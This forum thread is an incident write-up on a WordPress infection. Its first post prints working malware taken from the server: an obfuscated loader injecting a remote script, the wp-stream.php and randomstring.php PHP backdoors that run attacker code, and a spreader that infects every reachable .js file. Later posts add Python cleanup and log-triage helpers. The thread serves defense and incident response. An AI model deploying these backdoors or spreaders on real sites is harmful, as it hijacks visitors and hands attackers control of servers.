
Wordpress Hack [Replicating Malware with redirection + not so easy fix]

nesym

Why do I post this?

Educational purpose. If anyone stumbles upon something similar to know how to deal with it in the best way possible.

Why did I get malware/hacked in the first place?

No one to blame but yourself. You decide what you are going to put on your web server and only you have the power to do so. Most likely poor hardening, configuration, outdated plugins/software, or a malicious file uploaded directly by you.

Another good answer to this is:
Because hackers want to achieve something. From SEO to phishing/scam/steal data/just do harm/for fun because they can.

Ok, so many of you have been here. One of my projects just got defaced. That's the risk of using Wordpress and using nulled themes and plugins. To be honest I normally scan the files before I upload them to the server, but lately I was just too bold because I wasn't finding anything suspicious, since I'm using only Babiato, and uploaded them straight to the server. Even though Babiato has its good reputation and members here always helped each other (also helped me many times), there is always the option that one out of 1000 uploaders decides to put something funny in his uploads.

How to clean the hack?

1. Backup the hacked web server as is (with the malware)
2. Backup the DB files
3. Create a virtual machine
4. Sync the server to the virtual machine
5. Nuke the god damn server to the ground
6. Forbid its access to the WWW and scan the virtual machine using tools like clamAV, aibolit, wordfence and
7. Clean all the folders and files manually by removing them and removing strings in the code
8. Clean the database manually
9. Set the new server from the ground up
10. Harden the server
11. Change all your db names and passwords
12. Make an rsync backup every week and keep it somewhere on your PC

What exactly is that malware doing?

It has a php/js file that executes the malware. Normally it's not a rootkit but just normal malware that spreads across all folders that the www-data user has access to in the main public_html folder.

In my case, I think what installs the functions of the malware was masked as an .ico; then it shits all over your .js and .php (also .json) files and tries to replicate malicious code.

Here is an example of how it looks.

Redirection to:

The part that you have to GREP in JS/PHP:

Code:
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

Decoded it looks like this:

JavaScript:
// Decoded: every String.fromCharCode(...) replaced by the string it builds.
// The loader shows up several times in a row because the spreader prepends it on every pass.
Element.prototype.appendAfter = function(element) {
    element.parentNode.insertBefore(this, element.nextSibling);
}, false;
(function() {
    var elem = document.createElement('script');
    elem.type = 'text/javascript';
    elem.src = 'https://store.dontkinhooot.tw/stat.js';   // remote script pulled into every page
    elem.appendAfter(document.getElementsByTagName('script')[0]);
    elem.appendAfter(document.getElementsByTagName('head')[0]);
    document.getElementsByTagName('head')[0].appendChild(elem);
})();
// ... the block above repeats, then the victim file's own code follows:
var isIE=!1,isEdge=!1;

Check your Wordpress for files like wp-stream.php, wp-xmlrpc.php (there shouldn't be any wp-xmlrpc.php, only xmlrpc.php, in the default WP install)

wp-stream.php content

PHP:
<?php  if(isset($_POST['lt']) && md5($_POST['lt']) == base64_decode("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) {$lt = base64_decode($_POST['a']);file_put_contents('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);}} ?>

Decoded it looks like this:

PHP:
<?php
// base64 "MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=" decodes to the MD5 hex digest below.
if (isset($_POST['lt']) && md5($_POST['lt']) == '023258bbeb7ce955a690dca056be885d') {
    $lt = base64_decode($_POST['a']);            // attacker-supplied PHP, base64 in POST field "a"
    file_put_contents('lte_', '<?php ' . $lt);   // dropped next to wp-stream.php
    $lt = 'lte_';
    if (file_exists($lt)) { include($lt); unlink($lt); }   // run it, then delete it
}

I also noticed this not long ago, they may be connected:
(You can find this in your home page when viewing the page source)


HTML:
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">

<a style="font-size:18px;" href="https://downapkmod.com/" title="https://downapkmod.com/">https://downapkmod.com/</a>,

<a style="font-size:18px;" href="https://apkcop.com/" title="https://apkcop.com/">https://apkcop.com/</a>

</div>

lte_ content
Code:
<?php ini_set('max_execution_time', '300');
ini_set('memory_limit', '-1');

$files = array();
$b = "/../../../../../../../../";   // never used
$l = "/";
$it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT']);
$display = Array('php');            // never used
$search = Array('.js');
$files_ar = array();                // never used

// Pass 1: collect every file under DOCUMENT_ROOT whose name contains ".js"
// (".json" matches too). Both sides of the || are the same test, and the
// loose "== true" skips a name where ".js" sits at offset 0.
foreach (new RecursiveIteratorIterator($it) as $file) {
    if (strpos($file->getFilename(), '.js') == true || strpos($file->getFilename(), '.js') == true) {
        $q = strposa($file->getFilename(), $search);
        if ($q != "") {
            array_push($files, $file->getPathname());
        }
    }
}
foreach ($files as $onefile) {
    make_work($onefile);
}

// Passes 2-8: climb one directory per pass ("/../", "/../../", ...) so every
// sibling site the web user can write to is hit. $files is never reset, so
// files found earlier are pushed through make_work() again on every later pass.
for ($i = 1; $i < 8; $i++) {
    $l .= "../";
    try {
        $it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT'] . $l);
        $display = Array('php');
        $search = Array('.js');
        $files_ar = array();

        foreach (new RecursiveIteratorIterator($it) as $file) {
            if (strpos($file->getFilename(), '.js') == true || strpos($file->getFilename(), '.js') == true) {
                $q = strposa($file->getFilename(), $search);
                if ($q != "") {
                    array_push($files, $file->getPathname());
                }
            }
        }
        foreach ($files as $onefile) {
            make_work($onefile);
        }
    } catch (Exception $e) {
        // unreadable directory: silently move on
    }
}

// Returns the needles found in $haystack joined with "|", or "" when none match.
function strposa($haystack, $needle, $offset = 0) {
    if (!is_array($needle)) $needle = array($needle);
    $stroke = "";
    foreach ($needle as $query) {
        if (strpos($haystack, $query, $offset) !== false) { $stroke .= $query . "|"; }
    }
    return $stroke;
}

// Prepends the encoded loader to one file.
function make_work($f) {
    $g = file_get_contents($f);

    // "Already infected" marker. It decodes to "for.dontkinhooot.tw", while the
    // loader below encodes "store.dontkinhooot.tw", so the marker is never found
    // and an infected file gets the loader prepended again on each pass.
    if (strpos($g, '102,111,114,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119') !== false) {

    } else {
        $l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
        $g = file_get_contents($f);
        $g = $l2 . $g;
        @system('chmod 777 ' . $f);   // make the file world-writable before overwriting it
        @file_put_contents($f, $g);
        echo $f . "<br />";
    }
}

randomstring.php

Code:
<?php
$vrtna = '90b_xpdt*l63k8#yancofsrgmuvH72451\'ei-';
$umcear = Array();
$umcear[] = $vrtna[27].$vrtna[8];                                                                                                                  // "H*"
$umcear[] = $vrtna[18].$vrtna[22].$vrtna[34].$vrtna[16].$vrtna[7].$vrtna[34].$vrtna[3].$vrtna[20].$vrtna[25].$vrtna[17].$vrtna[18].$vrtna[7].$vrtna[35].$vrtna[19].$vrtna[17];   // "create_function" (removed in PHP 8)
$umcear[] = $vrtna[29].$vrtna[10].$vrtna[18].$vrtna[32].$vrtna[10].$vrtna[31].$vrtna[2].$vrtna[34].$vrtna[36].$vrtna[1].$vrtna[10].$vrtna[31].$vrtna[18].$vrtna[36].$vrtna[30].$vrtna[31].$vrtna[11].$vrtna[29].$vrtna[36].$vrtna[13].$vrtna[13].$vrtna[18].$vrtna[30].$vrtna[36].$vrtna[30].$vrtna[0].$vrtna[11].$vrtna[30].$vrtna[1].$vrtna[29].$vrtna[20].$vrtna[29].$vrtna[29].$vrtna[13].$vrtna[28].$vrtna[10];   // "26c165be-065c-4532-88c4-49340f22876" (hard-coded XOR key)
$umcear[] = $vrtna[14];                                                                                                                            // "#"
$umcear[] = $vrtna[18].$vrtna[19].$vrtna[25].$vrtna[17].$vrtna[7];                                                                                 // "count"
$umcear[] = $vrtna[21].$vrtna[7].$vrtna[22].$vrtna[3].$vrtna[22].$vrtna[34].$vrtna[5].$vrtna[34].$vrtna[16].$vrtna[7];                             // "str_repeat"
$umcear[] = $vrtna[34].$vrtna[4].$vrtna[5].$vrtna[9].$vrtna[19].$vrtna[6].$vrtna[34];                                                              // "explode"
$umcear[] = $vrtna[21].$vrtna[25].$vrtna[2].$vrtna[21].$vrtna[7].$vrtna[22];                                                                       // "substr"
$umcear[] = $vrtna[16].$vrtna[22].$vrtna[22].$vrtna[16].$vrtna[15].$vrtna[3].$vrtna[24].$vrtna[34].$vrtna[22].$vrtna[23].$vrtna[34];               // "array_merge"
$umcear[] = $vrtna[21].$vrtna[7].$vrtna[22].$vrtna[9].$vrtna[34].$vrtna[17];                                                                       // "strlen"
$umcear[] = $vrtna[5].$vrtna[16].$vrtna[18].$vrtna[12];                                                                                            // "pack"
// array_merge($_COOKIE, $_POST): every cookie and POST field is tried as a command carrier.
foreach ($umcear[8]($_COOKIE, $_POST) as $mcysgb => $slevav){
    // keystream: substr(str_repeat($name . $key, $len / strlen($name) + 1), 0, $len)
    function ytmnrg($umcear, $mcysgb, $cbodj){return $umcear[7]($umcear[5]($mcysgb . $umcear[2], ($cbodj / $umcear[9]($mcysgb)) + 1), 0, $cbodj);}
    // pack("H*", $value): the field value is hex
    function etbln($umcear, $uvrzj){return @$umcear[10]($umcear[0], $uvrzj);}
    // if count($parts) % 3 == 0: create_function("", $parts[1]($parts[2]))(); exit
    function jvjpux($umcear, $uvrzj){$mltsule = $umcear[4]($uvrzj) % 3;if (!$mltsule) {$kbjfl = $umcear[1]; $wtmzk = $kbjfl("", $uvrzj[1]($uvrzj[2]));$wtmzk();exit();}}
    $slevav = etbln($umcear, $slevav);
    // explode("#", hex_decoded_value ^ keystream)
    jvjpux($umcear, $umcear[6]($umcear[3], $slevav ^ ytmnrg($umcear, $mcysgb, $umcear[9]($slevav))));
}


To the so-called hackers:

Annoying I admit... you now force me to use docker for every single website installation and find other ways to protect myself.

To the people that got hacked:

Try to share what you got and how you think you got it, but don't insist and blame someone if you don't have the evidence. Sharing helps others protect against similar attacks and figure out how they got hacked in the first place.

PS: I found the core of the code before it deleted itself (have my ways) but I am not publishing it because it can be used the other way around.
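Added example, my code and not part of nesym's post: Python helpers for the GREP-and-strip step above, meant to run against the VM copy after the as-is backup. decode_charcodes() resolves the String.fromCharCode() lists (that is how the stat.js URL and the infection marker read out), strip_loader() removes every prepended copy of the loader, find_hidden_links() pulls the hrefs out of zero-size divs like the one in the page source above, and find_suspect_files() lists wp-stream.php / wp-xmlrpc.php / lte_ drops. The loader text is copied from make_work(); the file tree built in demo() is constructed; the extension list and the regexes are my assumptions about how the injection looks, not something the post states.

```python
import os
import re
import tempfile
from typing import Dict, List, Tuple

# The loader exactly as make_work() prepends it (copied from the lte_ listing above).
LOADER = (
    "Element.prototype.appendAfter = function(element) "
    "{element.parentNode.insertBefore(this, element.nextSibling);}, false;"
    "(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); "
    "elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); "
    "elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,"
    "116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);"
    "elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);"
    "elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);"
    "document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();"
)
# The "already infected" marker make_work() checks for before prepending.
MARKER = "102,111,114,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119"

CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
# One full copy of the loader, whitespace-tolerant, ending at the IIFE's "})();" (my assumption).
LOADER_RE = re.compile(
    r"Element\.prototype\.appendAfter\s*=\s*function\s*\(element\)\s*\{.*?\}\)\(\);\s*", re.S
)
# Zero-size div: the hidden SEO link pattern seen in the page source above.
HIDDEN_DIV_RE = re.compile(
    r'<div[^>]*style="[^"]*(?:height|width):\s*0(?:pt|px)[^"]*"[^>]*>(.*?)</div>', re.S | re.I
)
HREF_RE = re.compile(r'href="([^"]+)"', re.I)
SUSPECT_NAMES = {"wp-stream.php", "wp-xmlrpc.php", "lte_"}   # file names named in the post

def decode_charcodes(codes: str) -> str:
    """Build the text that String.fromCharCode(115,99,...) would produce."""
    return "".join(chr(int(c)) for c in codes.split(",") if c.strip())

def charcode_strings(js: str) -> List[str]:
    """Every String.fromCharCode(...) literal in js, decoded, in order of appearance."""
    return [decode_charcodes(m.group(1)) for m in CHARCODE_RE.finditer(js)]

def strip_loader(text: str) -> Tuple[str, int]:
    """Remove every copy of the loader; returns (cleaned text, copies removed)."""
    return LOADER_RE.subn("", text)

def find_hidden_links(html: str) -> List[str]:
    """hrefs inside zero-height/zero-width divs."""
    links: List[str] = []
    for m in HIDDEN_DIV_RE.finditer(html):
        links.extend(HREF_RE.findall(m.group(1)))
    return links

def find_suspect_files(root: str) -> List[str]:
    """Paths under root whose basename is one of the dropper/backdoor names."""
    return [os.path.join(d, n) for d, _, names in os.walk(root) for n in names if n in SUSPECT_NAMES]

def clean_tree(root: str, exts=(".js", ".json", ".php")) -> List[Tuple[str, int]]:
    """Strip the loader from every matching file under root (VM copy, never the live box first)."""
    cleaned = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                text = fh.read()
            new_text, n = strip_loader(text)
            if n:
                with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                    fh.write(new_text)
                cleaned.append((path, n))
    return cleaned

def demo() -> Dict[str, object]:
    """Constructed tree: a .js hit by three passes of make_work(), a clean .php, a dropper."""
    original_js = "var isIE=!1,isEdge=!1;\n"
    with tempfile.TemporaryDirectory() as root:
        js_path = os.path.join(root, "wp-includes", "js", "app.js")
        os.makedirs(os.path.dirname(js_path))
        with open(js_path, "w") as fh:
            fh.write(LOADER * 3 + original_js)
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php echo 'clean';\n")
        open(os.path.join(root, "wp-stream.php"), "w").close()
        suspects = [os.path.relpath(p, root) for p in find_suspect_files(root)]
        cleaned = clean_tree(root)
        with open(js_path) as fh:
            after = fh.read()
    return {
        "loader_url": charcode_strings(LOADER)[2],
        "marker_text": decode_charcodes(MARKER),
        "marker_in_loader": MARKER in LOADER,   # False: the spreader's guard never fires
        "suspects": suspects,
        "copies_removed": cleaned[0][1] if cleaned else 0,
        "restored": after == original_js,
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

strip_loader() only reverses this one loader; anything else the dropper changed (the .ico, wp-stream.php, database rows) still has to be handled by hand as the list above says, and a file that was also modified in other ways will not compare equal to a clean copy from the original package.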

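Added example, my code and not from the post: the string table of randomstring.php rebuilt in Python, plus a decoder that applies the same pack("H*") / XOR / explode("#") steps the backdoor applies to each cookie or POST field. That is what you use to find out what an operator actually ran once you have pulled the field values out of a PCAP or a mod_security audit log. The $vrtna string and index lists are copied from the sample; the parameter name "id" and the hex value in the usage are constructed.

```python
import re
from typing import List, Optional, Tuple

# $vrtna from randomstring.php (PHP's \' is just a quote).
VRTNA = "90b_xpdt*l63k8#yancofsrgmuvH72451'ei-"
# The $vrtna[...] index lists, in the order the $umcear[] entries are appended.
UMCEAR_INDEXES = [
    [27, 8],
    [18, 22, 34, 16, 7, 34, 3, 20, 25, 17, 18, 7, 35, 19, 17],
    [29, 10, 18, 32, 10, 31, 2, 34, 36, 1, 10, 31, 18, 36, 30, 31, 11, 29, 36,
     13, 13, 18, 30, 36, 30, 0, 11, 30, 1, 29, 20, 29, 29, 13, 28, 10],
    [14],
    [18, 19, 25, 17, 7],
    [21, 7, 22, 3, 22, 34, 5, 34, 16, 7],
    [34, 4, 5, 9, 19, 6, 34],
    [21, 25, 2, 21, 7, 22],
    [16, 22, 22, 16, 15, 3, 24, 34, 22, 23, 34],
    [21, 7, 22, 9, 34, 17],
    [5, 16, 18, 12],
]

def decode_table() -> List[str]:
    """Rebuild $umcear: each entry is the $vrtna characters at the listed indexes."""
    return ["".join(VRTNA[i] for i in idx) for idx in UMCEAR_INDEXES]

TABLE = decode_table()
KEY = TABLE[2]   # the hard-coded string mixed into the XOR keystream

def keystream(param_name: str, length: int) -> bytes:
    """ytmnrg(): substr(str_repeat($name . $key, $len / strlen($name) + 1), 0, $len)."""
    repeated = (param_name + KEY) * (length // len(param_name) + 1)
    return repeated[:length].encode("latin-1")

def decode_request_value(param_name: str, hex_value: str) -> Optional[Tuple[str, str]]:
    """The backdoor's own steps on one cookie/POST field: pack("H*") -> XOR with
    keystream -> explode("#"). It calls create_function() only when the part
    count is a multiple of 3, using parts[1] as a callable and parts[2] as its
    argument. Returns (callable, argument) or None. Non-hex or odd-length input is
    treated as "no trigger" (PHP's pack() would warn and produce garbage instead)."""
    try:
        raw = bytes.fromhex(hex_value)
    except ValueError:
        return None
    if not raw or not param_name:
        return None
    plain = bytes(a ^ b for a, b in zip(raw, keystream(param_name, len(raw))))
    parts = plain.split(b"#")
    if len(parts) % 3 != 0:
        return None
    return parts[1].decode("latin-1"), parts[2].decode("latin-1")

IDENT_RE = re.compile(r"[A-Za-z_]\w*$")

def looks_like_trigger(param_name: str, value: str) -> bool:
    """Hunting filter for captured requests: value decodes to the "#<callable>#<arg>" shape."""
    decoded = decode_request_value(param_name, value)
    return decoded is not None and IDENT_RE.match(decoded[0]) is not None

if __name__ == "__main__":
    for i, s in enumerate(TABLE):
        print(f"$umcear[{i}] = {s!r}")
    # Constructed value: "#strlen#abc" as it would arrive in a field named "id".
    print(decode_request_value("id", "4a1746440f54581603074e"))
```

Because the keystream is just the field name plus a key that sits in the file, anyone holding a copy of randomstring.php can read the traffic to it; there is no secret on the operator's side, only obfuscation.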
Thank you for this nice detailed guide. I was nervous to read the title earlier.
 
Were the infected files downloaded from Babiato?
Please share here more info about it so the admins can cure or ban or....
 
Possibly The Plus Addons for Elementor hack from the other day maybe?
 
This is a complete guide but not everyone can do it. It would be nice if anyone shared their documents
 
I think if your host has Imunify 360 installed in cPanel, it nullifies and removes malware. Works for me.
 
Informative post and a really good article to read peacefully. Sometimes, good hosting can play the role itself by kicking out malware automatically through its scan.
 
Ok, so many of you have been here. One of my projects just got defaced. That's the risk of using Wordpress and using nulled themes and plugins.
I'm using only Babiato and uploaded them straight to the server. Even though Babiato has it's good reputation and members here always helped each other (also helped me many times) there is always the option that one out of 1000 uploaders decides to put something funny in his uploads.

For these 2 statements allow me to disagree. A couple of days ago I found this specific injection on 3 different servers.
All of them had legit themes and plugins, not even one nulled. Can you explain it before pointing fingers?
 
No bro, he is talking about nulled plugins and themes!
Maybe, maybe not.

But my point is more that even only using legit purchased licensed plugins/themes and running security such as Wordfence doesn't leave you immune from attack, as the events of this week have proven.
 
This. Not just nulled plugins get malware: others simply don't get security updates or have an undisclosed security bug, even official ones... WordPress has this downside, but I think that with good monitoring (Wordfence for modified files, for example), or, as stated in the post, using docker containers or individual cPanel accounts, will make this hard to spread between your websites :)
 
Totally agree with you, and like @slvrsteele's post above yours, that's what I really want to say to the OP.
 
For these 2 statements allow me to disagree. Couple days ago found this specific injection on 3 different servers.
All of them had legit themes and plugins not even one nulled. Can you explain it before pointing fingers?

Try not to take it personally, please. I am not trying to attack anyone. Actually I'm thankful for everything I got out of the Babiato forum and I myself love to contribute as much as I can. If you read my post carefully enough you'll see I'm not pointing fingers. People describe me as a very rational and logical person and I tend to agree. My only motive here is to arouse attention, see if other members have similar problems. Start a discussion, hopefully one that will be beneficial for everyone. With all the respect to those people who share resources, their time and dedication. I very well understand the risks and that your server can be compromised from the outside even though that's very unlikely when you take the right measures.
 
Possibly The Plus Addons for Elementor hack from the other day maybe?

That's possible but I believe not. I only had that plugin on a single website and changed strings and names so no one would actually suspect it's that exact plugin. I even have a custom version of Elementor and others so I doubt an automated attack would happen. Also most of the countries outside of my region are banned from accessing sensitive content. You have to know how I changed those plugin strings in order to make use of the attack. For example if someone was looking for "Elementor" he wouldn't find a single line of code in my code containing that string. It goes the same for every other plugin. It costs me extra efforts but helps me improve security. Also anyone please don't ask for a tutorial on this just take it as is.
 
I wasn't taking it personally, don't get me wrong. But everyone always blames the nulled things. They might be right probably 50% of the time. But no one thinks of lazy or rookie developers that try to get out in front for a buck or two, or of those complicated scripts that display a simple date and hour across 50 files of PHP code.
Making mistakes as a developer is human, and some learn from their mistakes and improve while others just don't care and keep going. Some just think that aligning 3 lines of code makes them developers without any knowledge of coding safety practice or code security.

But every single end user out there is blaming the nulled versions of those scripts and it's not fair.
 
Deleted? why?
Brothers, I am not attacking anyone on here! I was just curious about which files get infected, that's all.
Passion for technology led this 50-year-old man to be an expert in many IT fields :cool:
 
It was too big and too direct. Sorry for that.

If you wanna see the patterns of an attack, then check the file timestamp for last modified and sync it with the error and access log for that period of time. On one of the servers I was talking about, the attacker tried for hours to find a flaw and found a way to use the update option of wp-admin.
185.212.129.205 - - [10/Mar/2021:11:58:28 +0100] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 561878

The most used attack is scanning the users through xmlrpc using the [login] request and trying to brute-force the login.
Another most common attack was using the revslider exploit (I didn't try lately so I don't know if it still works, but I still see scans for revslider in server logs).
There are many plugins/themes/scripts with well known flaws and 0-day critical flaws and that's why I always say to check your used plugins/themes against vulnerability database.
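Added example, my code and not the poster's: the timestamp correlation described above, in Python. It parses combined-format access log lines, flags the upload-plugin POST, xmlrpc.php calls and hits on a dropped wp-stream.php / wp-xmlrpc.php, and optionally keeps only the hits inside a window around the infected file's last-modified time. The first SAMPLE_LOG line is the one quoted in the reply; the other lines, the TEST-NET addresses, the user agents and the mtime are constructed.

```python
import re
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional

# Combined-format prefix; referer and user agent are optional because the line
# quoted in the thread does not carry them.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# (label, path pattern, POST only?)
SUSPICIOUS = [
    ("plugin upload through wp-admin", re.compile(r"^/wp-admin/update\.php\?action=upload-plugin"), True),
    ("xmlrpc.php call (login brute force / user enumeration)", re.compile(r"^/xmlrpc\.php"), False),
    ("request to a dropped backdoor file", re.compile(r"/(?:wp-stream|wp-xmlrpc)\.php"), False),
]

# First line: quoted in the reply above. The rest: constructed (TEST-NET addresses, invented times).
SAMPLE_LOG = [
    '185.212.129.205 - - [10/Mar/2021:11:58:28 +0100] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 561878',
    '203.0.113.5 - - [10/Mar/2021:09:10:01 +0100] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2021:09:10:02 +0100] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2021:09:10:03 +0100] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2021:11:30:00 +0100] "GET / HTTP/1.1" 200 15320 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2021:11:59:40 +0100] "POST /wp-stream.php HTTP/1.1" 200 0 "-" "python-requests/2.25.1"',
    '198.51.100.7 - - [10/Mar/2021:12:01:00 +0100] "GET /wp-admin/update.php?action=upload-plugin HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

def parse_line(line: str) -> Optional[dict]:
    """One access log line -> dict with a timezone-aware datetime, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    return e

def flag(entry: dict) -> Optional[str]:
    """Label for a suspicious request, or None (a GET to the upload URL is not an upload)."""
    for label, rx, post_only in SUSPICIOUS:
        if rx.search(entry["path"]) and (entry["method"] == "POST" or not post_only):
            return label
    return None

def triage(lines: List[str], mtime: Optional[datetime] = None, window_minutes: int = 30) -> List[dict]:
    """Flagged requests; with mtime (last-modified time of an infected file) given,
    only those within +/- window_minutes of it are kept."""
    hits = []
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        label = flag(e)
        if label is None:
            continue
        if mtime is not None and abs(e["ts"] - mtime) > timedelta(minutes=window_minutes):
            continue
        hits.append({**e, "label": label})
    return hits

def by_ip(hits: List[dict]) -> Dict[str, int]:
    """Hit count per source address, to see which IP to pull the full history for."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts

def demo() -> dict:
    # Constructed mtime; on a real box you'd take it from `stat` on the injected file.
    infected_mtime = datetime(2021, 3, 10, 12, 3, 0, tzinfo=timezone(timedelta(hours=1)))
    all_hits = triage(SAMPLE_LOG)
    near = triage(SAMPLE_LOG, mtime=infected_mtime)
    return {
        "flagged": len(all_hits),
        "by_ip": by_ip(all_hits),
        "near_mtime": [(h["ip"], h["method"], h["path"]) for h in near],
    }

if __name__ == "__main__":
    for h in triage(SAMPLE_LOG):
        print(h["ts"].isoformat(), h["ip"], h["method"], h["path"], "->", h["label"])
    print(demo())
```

Run it over the real access_log with the mtime of the first injected file: the brute force hours earlier drops out of the window, and what stays is the upload and the first call to the dropped file, which is the pair you then look up in the error log and the DB for the user that was created or logged in.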
 
How did you hide that string? Do you manually change the plugin code or something else?
 
I had a similar case where an additional .htaccess file was copied into each folder. In the public directory were a lot of changed and new files. It took a bit of time, but now the site is running normally again. To remove all the .htaccess files I ran a shell script. This saved a lot of work. The rest I had to clean manually.

The problem is that I haven't figured out where the malware came from. Especially because I hadn't changed or updated anything on the site for a few months.
 
Based on my experience:

First, if I download from a nulled site, I run it locally in my sandbox; after checking and cleaning, I push it to the server or host.
 